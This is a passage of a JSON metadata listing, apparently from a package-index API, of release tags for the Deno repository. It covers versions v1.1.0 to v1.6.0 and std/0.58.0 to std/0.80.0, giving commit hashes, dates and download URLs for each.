913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_